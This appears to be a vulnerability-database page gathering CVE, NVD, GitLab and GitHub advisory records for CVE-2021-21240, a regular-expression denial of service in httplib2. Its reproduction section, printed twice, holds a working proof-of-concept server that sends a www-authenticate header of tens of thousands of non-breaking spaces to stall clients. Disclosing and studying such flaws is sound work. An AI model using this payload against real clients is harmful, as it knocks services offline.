      "details": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.",
      "id": "GSD-2021-21240",
      "modified": "2023-12-13T01:23:10.963057Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2021-21240",
        "STATE": "PUBLIC",
        "TITLE": "Regular Expression Denial of Service in httplib2"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "httplib2",
                    "version": {
                      "version_data": [
                        {
                          "version_value": "\u003c 0.19.0"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "httplib2"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library."
          }
        ]
      },
      "impact": {
        "cvss": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 7.5,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "NONE",
          "integrityImpact": "NONE",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "version": "3.1"
        }
      },
      "problemtype": {
        "problemtype_data": [
          {
            "description": [
              {
                "lang": "eng",
                "value": "CWE-400 Uncontrolled Resource Consumption"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m",
            "refsource": "CONFIRM",
            "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
          },
          {
            "name": "https://github.com/httplib2/httplib2/pull/182",
            "refsource": "MISC",
            "url": "https://github.com/httplib2/httplib2/pull/182"
          },
          {
            "name": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc",
            "refsource": "MISC",
            "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
          },
          {
            "name": "https://pypi.org/project/httplib2",
            "refsource": "MISC",
            "url": "https://pypi.org/project/httplib2"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-93xj-8mrv-444m",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c0.19.0",
          "affected_versions": "All versions before 0.19.0",
          "cvss_v2": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-400",
            "CWE-937"
          ],
          "date": "2021-02-12",
          "description": "httplib2 is a comprehensive HTTP client library for Python. In httplib2, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.",
          "fixed_versions": [
            "0.19.0"
          ],
          "identifier": "CVE-2021-21240",
          "identifiers": [
            "CVE-2021-21240",
            "GHSA-93xj-8mrv-444m"
          ],
          "not_impacted": "All versions starting from 0.19.0",
          "package_slug": "pypi/httplib2",
          "pubdate": "2021-02-08",
          "solution": "Upgrade to version 0.19.0 or above.",
          "title": "Uncontrolled Resource Consumption",
          "urls": [
            "https://nvd.nist.gov/vuln/detail/CVE-2021-21240"
          ],
          "uuid": "6520f221-0fd9-4d4c-850e-b8b9d243f85f"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*",
                "cpe_name": [],
                "versionEndExcluding": "0.19.0",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2021-21240"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-400"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
            },
            {
              "name": "https://github.com/httplib2/httplib2/pull/182",
              "refsource": "MISC",
              "tags": [
                "Patch",
                "Third Party Advisory"
              ],
              "url": "https://github.com/httplib2/httplib2/pull/182"
            },
            {
              "name": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m",
              "refsource": "CONFIRM",
              "tags": [
                "Exploit",
                "Mitigation",
                "Third Party Advisory"
              ],
              "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
            },
            {
              "name": "https://pypi.org/project/httplib2",
              "refsource": "MISC",
              "tags": [
                "Product",
                "Third Party Advisory"
              ],
              "url": "https://pypi.org/project/httplib2"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV2": {
          "acInsufInfo": false,
          "cvssV2": {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          "exploitabilityScore": 10.0,
          "impactScore": 2.9,
          "obtainAllPrivilege": false,
          "obtainOtherPrivilege": false,
          "obtainUserPrivilege": false,
          "severity": "MEDIUM",
          "userInteractionRequired": false
        },
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      },
      "lastModifiedDate": "2021-02-12T14:56Z",
      "publishedDate": "2021-02-08T20:15Z"
    }
  }
}

ghsa-93xj-8mrv-444m

Vulnerability from github

Published

2021-02-08 19:41

Modified

2024-09-23 16:13

Severity ?

7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.7 (High) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P

Summary

Regular Expression Denial of Service (REDoS) in httplib2

Details

Impact

A malicious server which responds with long series of \xa0 characters in the www-authenticate header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.

Patches

Version 0.19.0 contains new implementation of auth headers parsing, using pyparsing library. https://github.com/httplib2/httplib2/pull/182

Workarounds

py import httplib2 httplib2.USE_WWW_AUTH_STRICT_PARSING = True

Technical Details

The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/init.py#L336-L338

The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:

\s*[^ \t\r\n=]+\s*=

Since all three infinitely repeating groups accept the non-breaking space character \xa0, a long string of \xa0 causes catastrophic backtracking.

The complexity is cubic, so doubling the length of the malicious string of \xa0 makes processing take 8 times as long.

Reproduction Steps

Run a malicious server which responds with

www-authenticate: x \xa0\xa0\xa0\xa0x

but with many more \xa0 characters.

An example malicious python server is below:

```py from http.server import BaseHTTPRequestHandler, HTTPServer

def make_header_value(n_spaces): repeat = "\xa0" * n_spaces return f"x {repeat}x"

class Handler(BaseHTTPRequestHandler): def do_GET(self): self.log_request(401) self.send_response_only(401) # Don't bother sending Server and Date n_spaces = ( int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences if len(self.path) > 1 else 65512 # Max header line length 65536 ) value = make_header_value(n_spaces) self.send_header("www-authenticate", value) # This header can actually be sent multiple times self.end_headers()

if name == "main": HTTPServer(("", 1337), Handler).serve_forever() ```

Connect to the server with httplib2:

py import httplib2 httplib2.Http(".cache").request("http://localhost:1337", "GET")

To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000

References

Thanks to Ben Caller (Doyensec) for finding vulnerability and discrete notification.

For more information

If you have any questions or comments about this advisory: * Open an issue in httplib2 * Email current maintainer at 2021-01

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "httplib2"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.19.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-21240"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-400"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-02-08T19:41:34Z",
    "nvd_published_at": "2021-02-08T20:15:00Z",
    "severity": "HIGH"
  },
  "details": "### Impact\nA malicious server which responds with long series of `\\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server.\n\n### Patches\nVersion 0.19.0 contains new implementation of auth headers parsing, using pyparsing library.\nhttps://github.com/httplib2/httplib2/pull/182\n\n### Workarounds\n```py\nimport httplib2\nhttplib2.USE_WWW_AUTH_STRICT_PARSING = True\n```\n\n### Technical Details\n\nThe vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338\n\nThe section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have:\n\n    \\s*[^ \\t\\r\\n=]+\\s*=\n\nSince all three infinitely repeating groups accept the non-breaking space character `\\xa0`, a long string of `\\xa0` causes catastrophic backtracking.\n\nThe complexity is cubic, so doubling the length of the malicious string of `\\xa0` makes processing take 8 times as long.\n\n### Reproduction Steps\n\nRun a malicious server which responds with\n\n    www-authenticate: x \\xa0\\xa0\\xa0\\xa0x\n\nbut with many more `\\xa0` characters.\n\nAn example malicious python server is below:\n\n```py\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\ndef make_header_value(n_spaces):\n    repeat = \"\\xa0\" * n_spaces\n    return f\"x {repeat}x\"\n\nclass Handler(BaseHTTPRequestHandler):\n    def do_GET(self):\n        self.log_request(401)\n        self.send_response_only(401)  # Don\u0027t bother sending Server and Date\n        n_spaces = (\n            int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences\n            if len(self.path) \u003e 1 else\n            65512  # Max header line length 65536\n        )\n        value = make_header_value(n_spaces)\n        self.send_header(\"www-authenticate\", value)  # This header can actually be sent multiple times\n        self.end_headers()\n\nif __name__ == \"__main__\":\n    HTTPServer((\"\", 1337), Handler).serve_forever()\n```\n\nConnect to the server with httplib2:\n\n```py\nimport httplib2\nhttplib2.Http(\".cache\").request(\"http://localhost:1337\", \"GET\")\n```\n\nTo benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000\n\n\n### References\nThanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification.\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new)\n* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)",
  "id": "GHSA-93xj-8mrv-444m",
  "modified": "2024-09-23T16:13:16Z",
  "published": "2021-02-08T19:41:59Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21240"
    },
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/pull/182"
    },
    {
      "type": "WEB",
      "url": "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/httplib2/httplib2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/httplib2/PYSEC-2021-16.yaml"
    },
    {
      "type": "WEB",
      "url": "https://pypi.org/project/httplib2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Regular Expression Denial of Service (REDoS) in httplib2"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

cve-2021-21240

Vulnerability from cvelistv5

pysec-2021-16

Vulnerability from pysec

rhsa-2021_2116

Vulnerability from csaf_redhat

gsd-2021-21240

Vulnerability from gsd

ghsa-93xj-8mrv-444m

Vulnerability from github

Impact

Patches

Workarounds

Technical Details

Reproduction Steps

References

For more information

Tags

Sightings

Nomenclature